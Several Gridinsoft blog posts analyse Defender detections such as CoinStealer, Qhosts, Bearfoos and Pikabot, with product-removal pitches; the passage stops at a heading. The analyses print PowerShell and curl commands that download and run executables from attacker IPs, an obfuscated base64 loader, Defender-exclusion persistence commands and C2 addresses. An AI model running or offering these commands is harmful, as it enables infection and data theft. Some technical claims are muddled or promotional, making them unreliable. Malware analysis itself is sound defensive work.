Trojan:PowerShell/CoinStealer.RP!MTB Virus Detection Overview

Trojan:PowerShell/CoinStealer.RP!MTB detection name corresponds to an infostealer malware that targets crypto wallets among other things. The malware family it belongs to may be different, as the main reason why it is detected – targeting crypto wallets credentials – is now a widespread feature of infostealers. Also, the detection name points clearly at this virus running commands in the PowerShell environment. This, in fact, complicates the analysis: the detection of Microsoft Defender points at a genuine PowerShell instance.

One less obvious thing about CoinStealer.RP!MTB is the fact of it being a detection of a heuristic system. That is actually the reason why it has no identification of a malware family in the detection name. With this detection, Microsoft Defender effectively says “I have noticed fishy activity that targets at stealing login data to crypto wallets”. At the same time, it is hardly a false positive: while heuristics can show a false detection, there are no cases of CoinStealer being incorrect.

Dangers of this malware, aside from the said crypto wallet losses, is losing access to your online accounts. At its core, the CoinStealer virus is an infostealer, thence it can target social media accounts and accounts of desktop apps. Several samples that I’ve been analyzing were stealing Discord and Steam session tokens.

Spreading Ways

PowerShell script is a rather common form for malicious programs, though it requires some specific spreading approaches. In particular, “useful scripts for Windows speed-up” or similar stuff that you may find online is what can carry this virus. And there’s more – frauds constantly seek for new ways to make the user execute the malware on their own.

For instance, they may use landing pages that appear after the redirect from another website, asking to download and run the script “to prove that you’re not a robot”. In some cases, there was an entire malicious script posted as a text, with the demand to copy it and paste into the PowerShell. Obviously, this won’t end up with anything but malware injection. And this is what fits the Trojan:PowerShell/CoinStealer.RP!MTB ideally.

Technical Analysis

Now, let’s have a deeper look into how the malicious script functions. In fact, the PowerShell part is mostly about downloading the actual malware. PS scripts, although being abused by malware quite often, are not fit for accessing folders or extracting data. Still, it is enough to download the virus and configure the networking so the malware will have no problems with C2 communications. It also provides the malicious program with all the necessary privileges and anti-detection protection, so it runs unbothered.

One particular malware sample that uses PowerShell scripts for loading is Lumma Stealer. The script that eventually creates the Trojan:PowerShell/CoinStealer.RP!MTB detection runs a rather simple operation. It connects to a remote server, downloads the file, and runs it from that exact location.

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://20.99.186.246:223/1.exe', 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe');Start-Process 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe'

Malware Execution

As I’ve opted for Lumma as the most prominent “user” of the injection through PowerShell, I will further analyze it to show what it can do in the infected system. Following the execution, it loads the DLLs by abusing svchost.exe – a legitimate Windows process. Malware simply commands it to execute the library it needs:

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe -k DcomLaunch -p

This is what gives malware not only the full set of libraries to run with but also the much-needed persistence. At this point, part of the CoinStealer virus files are running with system-level privileges, so antivirus programs will likely treat it as a safe process. Further, it switches to the main course of the attack – collecting user data.

Data Collection

Despite the fact that I’ve chosen a specific malware family to show off the capabilities of the malware that the Trojan:PowerShell/CoinStealer.RP!MTB can deliver, the same list applies to pretty much any infostealer that can appear under this circumstance. It goes through the folders of web browsers, collecting login credentials.

%localappdata%\\Google\\Chrome\\User Data
%localappdata%\\Chromium\\User Data
%localappdata%\\Microsoft\\Edge\\User Data
%localappdata%\\Kometa\\User Data
%localappdata%\\Opera Software\\Opera Stable
%localappdata%\\Opera Software\\Opera GX Stable

Data collection from the browser is followed by the much expected collection of crypto wallets data. It seeks for the keywords in file and folder names (like “bitcoin” or “coinbase”) to locate the needed directory. Then, it goes for the Important Files/Profile and dumps all the data from these folders. This further allows cybercriminals to drain all the contents of these wallets.

Exfiltration & C2 Communications

The malware rarely employs unusual tactics when it comes to communications with the command server. It carries a pack of C2 addresses embedded into its own code, and goes through this list trying to find an active one.

https://barebrilliancedkoso.shop/api
https://liabiliytshareodlkv.shop/api
https://notoriousdcellkw.shop/api

After establishing the connection, CoinStealer.RP!MTB sends the entire pack of data to the command server. Depending on the malware sample, it may be a plain text file, or an archive with extracted credentials sorted by the source and type. But almost always it uses encrypted connection, which prevents almost any attempts of packet analysis.

How to Remove Trojan:PowerShell/CoinStealer.RP!MTB?

To get rid of the CoinStealer.RP!MTB, I recommend using GridinSoft Anti-Malware. Removing both malicious script and the actual malware manually is not a trivial task, as they may hide pretty deep in the system. Also, as it usually happens to modern malware, it creates several copies of itself in the disk, making the manual removal even more complicated. GridinSoft Anti-Malware will do all this for you in just a few clicks.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:PowerShell/CoinStealer.RP!MTB appeared first on Gridinsoft Blog.

Trojan:Win32/Qhosts Overview

Trojan:Win32/Qhosts is a Microsoft Defender detection for dropper malware or remote-access trojans. Such malware is made to provide access to an infected system and deliver a payload. It is known for modifying the HOSTS system file, which is used to map hostnames to IP addresses. By doing so, it can provide itself with stable connectivity to the command server. In some cases, it does this to prevent the user from accessing antivirus vendors’ websites and getting security updates from Microsoft.

This malware is typically spread through dodgy software, like unauthorized activation tools, keygens and the like. Depending on the version, Trojan:Win32/Qhosts may block access to various services and sites, including those of Adobe and Microsoft. This partly explains its actions concerning the HOSTS file but does not account for its remote access capabilities. Sometimes, it also prevents antivirus software from accessing the Internet. This happens particularly often to software of renowned security vendors, whose server addresses are well-known.

Technical Analysis

Let’s get into the behavior analysis of Trojan:Win32/Qhosts using a specific instance as an example. In this case, it is a Windows activator, which has both its declared functionality and hidden malicious features. We’ll start with its launch, which is initiated by the user. Since this is an activator, it implies that the anti-malware software on the system must be disabled for its use. Despite this, the program performs standard checks for the presence of sandboxing/debugging or anti-malware software. It checks the following registry values:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\System\Setup
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2102.4-0\X86\MpOav.dll

Delivering the Payload

The malware then drops files into the system’s temporary directory. Among these files are both the payload and the files necessary for Windows activation. Regarding the former, the files include:

C:\Users\user\AppData\Local\Temp\RarSFX0\Install.cmd
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\bootsect.exe
C:\Users\user\AppData\Local\Temp\RarSFX0\bin\grldr

It also drops a large number of certificates into the folder C:\Users\user\AppData\Local\Temp\RarSFX0\certs.

Malicious Activity

Next, the malware creates several new processes from the temporary folder, then creates and runs additional executable files.

C:\Users\\AppData\Local\Temp\RarSFX0\MSG.exe
C:\Users\\AppData\Local\Temp\RarSFX0\VLD.exe

The malware then executes Visual Basic scripts (install.vbs) using cscript.exe:

cscript //nologo "C:\Users\\AppData\Local\Temp\RarSFX0\install.vbs"
cscript //nologo C:\Windows\system32\slmgr.vbs -ipk HERE-GOES-WINDOWS-ACTIVATION-KEY

As you might have guessed, this script installs a license key into the system. That is actually one of the dangers of this malware: the victim sees the system activation process and thinks everything is fine. But meanwhile, the malware does its dirty job in the background.

Gaining Persistence

The actions of the program do not end there; the malware continues with establishing persistence in the system. This specific sample appears to work as a dropper, so maintaining constant access to the system is crucial. To achieve this, it modifies settings in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows and other system-level keys to ensure it can survive reboots and maintain control over the system. Additionally, the malware manipulates the following keys:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\CheckSetting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.102\CheckSetting

The first four keys are associated with checks performed by the Security and Maintenance feature in Windows. Each “CheckSetting” entry can correspond to specific checks such as firewall status, antivirus status, etc. This information also goes as a part of system fingerprinting – action that all malware does to distinguish attacked systems.

Hosts File Manipulation

The malware then proceeds to manipulate the hosts file. To do this, it creates a specific registry key:

HKEY_CURRENT_USER\SOFTWARE\WinRAR SFX\C%%Windows%System32%drivers%etc

This key is associated with self-extracting WinRAR archives. Based on the path, it is linked to a WinRAR operation affecting the hosts file. The malware drops a temporary file named __tmp_rar_sfx_access_check_34985937, which WinRAR creates during the extraction process of the self-extracting archive (SFX). The filename indicates a temporary access check to ensure the program has sufficient rights to overwrite the hosts file in this directory. Subsequently, the malware replaces the Hosts file with the one it needs.

This could be done for several reasons:

1. To prevent the system from contacting the license verification server, ensuring that the illegal activation remains in place.
2. To block system or anti-malware updates.
3. To redirect the user to fraudulent websites.

How To Remove Trojan:Win32/Qhosts?

Removing Trojan:Win32/Qhosts involves several steps and requires an advanced anti-malware solution. GridinSoft Anti-Malware is the one that you can rely on in this question. Initially, you need to clean the system of malware. After cleaning the system, you need to restore the hosts file. Follow the instructions below for each of the steps.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Restore the Hosts File

1. Go to the Tools tab and click Reset Browser Settings.

   

2. Uncheck all boxes except for the one next to the HOSTS file and click Reset.
   

By following these steps, your system will be fully restored and ready for use.

The post Trojan:Win32/Qhosts appeared first on Gridinsoft Blog.

Trojan:Script/Downloader!MSR Overview

Trojan:Script/Downloader!MSR is a heuristic detection of Microsoft Defender that flags a small malware downloading script. Unlike a full-fledged dropper, this malicious thing is in fact disposable: it never runs again after execution. This loader executes a selection of commands in PowerShell or Command Prompt, which triggers Microsoft Defender. But since this detection is heuristic, and malicious activity comes from the activity within the PS environment, the built-in antivirus says that the powershell.exe is in question.

Trojan:Script/Downloader!MSR is typically spread through common malware methods such as game mods, pirated games, software, activators (KMS), and keygens. It is also distributed under the guise of legitimate files, masked with double extension and an altered file icon. As for the payload, Trojan:Script/Downloader!MSR most often delivers spyware, remote administrative tools, and ransomware.

Technical Analysis

Let’s get into Trojan:Script/Downloader!MSR operations on the target system by analysing the scripts this malware may use. By its nature, it does not perform any checks for the presence of a sandbox. Instead, it immediately executes its function—dropping the payload:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }

As we can see, the malicious script uses PowerShell to download and execute a malicious file. It employs the ExecutionPolicy Bypass parameter to run the script without security restrictions. -NoExit makes the console window persistent, i.e. it does not close once the command execution is over, so the script can execute other commands. It also uses -WindowStyle Hidden to hide the PowerShell window, so the user does not notice its execution. Next, the Start-Process command ‘C:\\test-MDATP-test\\invoice.exe’} executes the downloaded file.

Basic Code Obfuscation

Although this is a fairly primitive loader script, some obfuscation may be used to make the detection harder. Below, you can see one of the intermediary commands that the script can execute to add a specific registry key. This key may further be a foothold for the malware the script will deploy, for gaining persistence or storing valuable data.

reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

This way, the malware adds a new registry key and sets its value to a base64-encoded string. The base64-encoded shell code looks like this:

powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}

Even though the malware has an encryption key, the obfuscation makes it harder to detect.

Is Trojan:Script/Downloader!MSR a False Positive?

Sometimes, Trojan:Script/Downloader!MSR can be detected by antivirus software as a false positive. This mostly occurs when a program lacks a valid certificate and accesses the internet. In some cases, detection happens when the program contacts suspicious IP addresses. Regardless, it is always essential to check such detections to rule out any real threats.

For these purposes, I recommend using GridinSoft Anti-Malware. In addition to scanning and cleaning your system, it provides proactive device protection and Internet Security, which will prevent threats even at the download stage.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Script/Downloader!MSR appeared first on Gridinsoft Blog.

Trojan:Win32/Bearfoos.B!ml Overview

Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender AI system for infostealer malware and spyware. Typically, the malware this detection flags belongs to a broader family, but may as well mean a small-batch virus. Reason for the detection is a specific behavior pattern that the AI system has spotted, which means it is not really clear what exactly caused it. Bearfoos embeds itself deeply into the system, often unnoticed by the user. It targets cookies, password databases, cryptocurrency wallets, and other sensitive information stored on the infected system.

Once the data is collected, the malware transmits it to a command-and-control server, then enters a dormant state, waiting for further commands. This allows it to remain undetected for extended periods. In addition to data theft, Bearfoos can log keystrokes, take screenshots, record video or audio using the system’s peripherals, and perform other spying activities.

Trojan:Win32/Bearfoos.B!ml spreads using methods typical for this type of malware. Most commonly, it is distributed through game cheats, mods, and dubious utilities. The second most common method of distribution is email spam.

Technical Analysis

Let’s break down how Trojan:Win32/Bearfoos.B!ml behaves in an infected system. The particular sample that I review appears to be an offshoot of AgentTesla spyware. I’ll try to explain the most important aspects of this threat as clearly as possible.

Upon infiltrating the system, the malware performs checks in the following locations for the presence of sandboxes and debuggers. This is a typical step that malware does to avoid analysis and “useless” infections.

C:\drivers\etc\hosts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\system32\VERSION.dll

Gaining Persistence

After that, it drops its own copy to the AppData/Roaming folder and assigns it a random name. In my case, it was vzCravLx.exe. Next, the malware checks Microsoft Defender settings:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus

These registry values pertain to various components of the system’s anti-malware protection settings. The malware checks these settings to understand the system’s security posture and plan further actions. In our scenario, when the Defender settings were not altered by default, Bearfoos proceeded to alter Defender. It executes this selection of commands:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\\AppData\Roaming\vzCravLx.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" /XML "C:\Users\\AppData\Local\Temp\tmp6EAE.tmp

This is what provides persistence to the malware. With the first command, it excludes the path to its own executable and from Microsoft Defender scanning. The second command calls for the creation of a task in Task Scheduler to run the malware every once in a while. After that, Bearfoos a.k.a AgentTesla deletes the original file and keeps operating only with these protected duplicates.

Data Collection

The next phase involves the collection of sensitive information. First of all, the malware checks a selection of files that belong to web browsers, seeking for passwords, cookies and session tokens. Here is the list of browsers in question:

As we can see, these locations mainly consist of user data from Chromium-based web browsers. Aside from them, malware crawls credentials from desktop mailing clients and some FTP/VPN applications.

Command & Control Server

The Bearfoos trojan sends HTTP requests to the following addresses to download various files, including a CAB file from the Windows Update server and certificates from Sectigo and Microsoft:

GET http://download.windowsupdate.com/d/msdownload/update/others/2015/05/17930914_a3b333eff1f0428f5a2c87724c542504821cdbd8.cab
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200
GET http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt 200
GET http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt 200

These requests might be attempts to disguise malicious activity as legitimate actions. The malware also resolves DNS names for several domains, including the legitimate download.windowsupdate.com, and potentially suspicious domains such as mail.commtechtrading[.]com and chir104.websitehostserver[.]net. These latter domains could be part of its command-and-control (C2) infrastructure used for data exfiltration. The malware establishes the following TCP/UDP connections with various IP addresses:

TCP 23.53.122.213:80
TCP 173.236.63.6:587
TCP 20.99.133.109:443
TCP 23.216.147.71:80
TCP 23.216.81.152:80
UDP 192.168.0.12:137

After completing the data exfiltration, the malware enters a waiting mode, listening for commands from the C2 server. During this standby period, it continues to collect data, capturing keystrokes, taking screenshots, and recording audio and video from peripheral devices.

Is Trojan:Win32/Bearfoos.B!ml a False Positive?

As I mentioned earlier, the detection of Trojan:Win32/Bearfoos.B!ml is performed using Microsoft Defender’s AI-based system. However, this method is prone to false positives, and legitimate files, such as those associated with recently updated games or programs, are often mistakenly flagged as malicious. In particular, it is often to see false positives in small-batch programs from GitHub, certain emulator apps, and in some bizarre cases even own Windows files.

While it is easy to spot a false positive with a program that you know and trust, doing so with a less familiar app may be problematic. If you are not sure about the source and developer, bold guessing may be a particularly destructive practice. That is why a second opinion anti-malware scan is needed.

How to Remove Trojan:Win32/Bearfoos.B!ml?

To remove Bearfoos.B!ml trojan or check whether it is a real detection, I recommend using GridinSoft Anti-Malware. This program is not vulnerable to malware attacks as Microsoft Defender, and will easily spot even the most recent malware samples, thanks to its multi-component detection system. Follow the guide below to get your system as good as new.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Bearfoos.B!ml appeared first on Gridinsoft Blog.

What is Trojan:Win32/Znyonm?

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually the one that uses deep obfuscation and anti-analysis techniques. In particular, this detection name appears with malware like GuLoader, Remcos RAT, and Pikabot. Others can also be seen though, as Microsoft does not attach this detection name to specific malware families, but rather to its properties.

The primary objectives of Znyonm include facilitating remote access or deploying additional payloads. As a preliminary stage, it establishes persistence within systems, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples found on VirusTotal, I’ve seen the usage of multi-stage loading of code fragments from remote servers via .LNK, VBS, and PowerShell scripts. This allows it to bypass antivirus detection and deliver any malicious payload to the victim’s computer.

Znyonm Trojan Analysis

For the sample of Znyonm to analyze, I’ve picked one of fresh samples of Pikabot. This is a modular backdoor malware that emerged in early 2023. The malware gained prominence as a substitute for the infamous QakBot. The malware serves as an initial access point in high-profile cyberattacks. Its primary tactic for initial access is spear phishing and thread-hijacking techniques. Pikabot deploys exploit kits, ransomware, or other malware tools.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; frauds particularly employ thread hijacking to make it look genuine. The format of the attachment may vary – from a PDF document to a ZIP archive that contains the payload. In either case, email text will try to convince the user to launch the attachment and follow its instructions.

Another method is malvertising via major ad engines like Google or Facebook. Hackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of checks to avoid analysis, by calling NtQueryInformationProcess. Then, it decrypts the DLL file and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from encrypted parts of the DLL it arrives in. To gain persistence and privileges, Pikabot/Znyonm performs process hollowing.

C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

Pikabot malware avoids detection by directly calling the required APIs using their hash for the first 3 APIs. Next, it switches to dynamic API resolution to evade EDR/XDR detection. The malware checks the system language before gathering system information, ceasing execution if one from the ban list is found. After passing the check, it collects system properties to fingerprint the system.

The fingerprint includes user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of its process. This is a typical set of data for backdoor malware, called to distinguish one system from another. Some backdoors though were gaining the ability to collect more data with time, getting closer in functionality to spyware.

C2 Communication

The malware sends collected data to the command server using an HTTP POST request over HTTPS protocol. Upon the first contact, the command server sends the response with the command and configuration info. The latter consists of a command-specific code, URL, file address, and the action malware should execute. Some of the commands also require Pikabot to send the results to the C2.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about Trojan:Win32/Znyonm detection, an anti-malware scanning is needed. As you can see from the analysis above, Znyonm is nothing to mess around with, and can lead to more serious and diverse malware infections. Gridinsoft Anti-Malware will fit perfectly for malware removal.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Znyonm appeared first on Gridinsoft Blog.

What is Trojan:Win32/Vigorf.A?

Trojan:Win32/Vigorf.A is the detection name that Microsoft Defender attributes to dropper/loader malware. This generic detection name refers to a whole range of malicious programs, rather than one specific family. The goal of Vigorf.A is unauthorizing system access, and further malware distribution. As my detailed analysis has shown, Trojan:Win32/Vigorf.A uses various methods to bypass antivirus programs and operating system protection.

Usually, this malware downloads or installs other malicious programs on the computer. It drops its files and modifies system settings and other configuration files to gain persistence. Additionally, it connects to remote servers to send collected information and download additional malicious programs.

Is Trojan:Win32/Vigorf.A False Positive?

False positives with the Vigorf.A name is not a common occurrence. There are only a few cases discussed online, and all of them are related to the software that borders on malicious.

The most common case here is game modifiers or patches. Such tools modify game memory or files to unlock features and can be misidentified as Trojan:Win32/Vigorf.A because of their ability to intrude into other programs’ memory. Similar tools and scripts used by software developers can be misidentified as malicious. While being potentially safe and legitimate, it is important to treat such software with care.

Vigorf.A Trojan Analysis

Studying the behavior of Trojan:Win32/Vigorf.A sample on an infected system showed me how elaborate these threats can be. Not only does the Trojan collect personal user data, but it also modifies system settings, creating additional vulnerabilities and opening the door for other malware.

Methods of Distribution

Trojan:Win32/Vigorf.A is often spread via spam e-mail campaigns containing malicious attachments or links. Once the user opens the attachment or clicks on the link, the Trojan is installed on their computer, either directly or through the loading script. Despite being used for malware spreading for years now, email spam remains a particularly potent and effective spreading option.

Malvertising is another tricky method that has been used to spread Trojan:Win32/Vigorf.A as far as my research goes. This malware exploits ad networks to display malicious ads in search engine results. Such ads redirect users to malicious duplicates of familiar sites or directly download malware onto their devices.

In addition, Vigorf.A is often hidden in packages containing illegal or pirated software. When I download and install such programs, the trojan is also installed on my computer. Often such software is offering for free, which makes it attractive, but it ends up costing more because of the damage the trojan causes.

Launch, Gaining Persistence and Data Collection

After launching in the system, Trojan:Win32/Vigorf.A adds itself to autorun by taking advantage of the Startup folder. This allows it to start automatically every time the system starts. In my case, I found a strange shortcut adxjcv4.lnk, which turned out to be associated with the trojan.

APPDATA%\microsoft\windows\start menu\programs\startup\_adxjcv4_.lnk

Alternatively, Vigorf.A may use the DLL hijacking technique. This happens particularly often when malware arrives with the loader, which unpacks the sample and handles the launch. The way to run the malware is nothing unusual – a PowerShell command that runs the malware DLL through the call to rundll32.exe.

rundll32.exe %windir%\system32\advpack.dll

After the launch, malware checks the system location by its IP address and switches to collecting the system data. This gives Vigorf.A the ability to distinguish that particular system from others. This can as well be used for more targeted attacks or to get a rather exhausting set of victims’ system info to analyze. Malware particularly checks the values of the following keys to get info about programs present on the PC:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA} and \=\Count

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F} and \=\Count

By checking the next keys, Trojan:Win32/Vigorf.A learns about the devices and networks to which the computer connects and can identify the most vulnerable points for further attacks. This information helps malware masters to deploy malware in a more relevant manner, and get extra profit from systems related to a network.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache and \=\Intranet

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

C2 Communications and Malware Delivery

After collecting all this data, Vigorf encrypts and >sends it to the command server using HTTP POST request. The list of command servers was predefined for the samples I’ve worked with, but this may differ in other cases. Server, in turn, responds with a blob of data that instructs malware for further actions. Obviously for dropper malware, payload delivery is one of the most probable instructions it can get.

To instruct the dropper for malware delivery, C2 sends the URLs Vigorf should connect and download it from. It sends HTTP GET commands to the following URLs:

http[:]//185.117.75.198/fiscal/1
http[:]//194.163.43.166/08/st/m.zip

Files downloaded from these addresses were disguised as ordinary documents or incomplete files, making them difficult to detect and analyze. Once Vigorf finishes downloading the malware, it uses system utilities such as wuapp.exe to launch it.

"C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\sHrhJDaCBu\cfg"

How to Remove Trojan:Win32/Vigorf.A?

To remove Trojan:Win32/Vigorf.A, I recommend using GridinSoft Anti-Malware. It will detect and remove Vigorf.A, as well as find other malicious programs downloaded by it. This Anti-Malware can also work with Windows Defender to create an additional line of defense.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

I would also recommend keeping the system and all programs updated to the latest versions to eliminate vulnerabilities that malware can exploit.

The post Trojan:Win32/Vigorf.A appeared first on Gridinsoft Blog.

Trojan:Win32/Cerber Overview

Trojan:Win32/Cerber is an older type of malware classified as ransomware. It first appeared in 2016 and quickly became one of the most common types of ransomware. Cerber encrypts files on the infected computer and demands a ransom (usually in Bitcoin) to provide the decryption key. The main spreading way of this malware is phishing emails, but it’s also common to see its loader hidden in pirated software.

As I’ve mentioned in the introduction, the detection name Trojan:Win32/Cerber was once referring to a specific ransomware family, Cerber. But after it stopped its activity in 2018, Microsoft started using its name for similar ransomware samples. Usually, those are some small-batch ransomware families that share code similarities with Cerber (or possibly are its direct descendants).

After infecting a victim’s PC, Win32/Cerber performs some basic checks and begins encrypting data. The malware adds its custom extension that differs from one sample to another; among the examples are .cerber, “.ba99”, “.98a0”, “.a37b”, “.a563”, or “.beef”. After finishing the encryption, it publishes a ransom demand note, which the victim is about to pay off.

One unusual tactic that I’ve seen in Trojan:Win32/Cerber is the use of a voice notification. After the encryption process is complete, each folder with encrypted data contains a ransom note titled #DECRYPT MY FILES#.txt. Additionally, these folders include #DECRYPT MY FILES#.html and #DECRYPT MY FILES#.vbs files. The latter contains a VBScript that, when executed, states the following:

“Attention. Attention. Attention. Your documents, photos, databases and other important files have been encrypted!“.

Technical Analysis

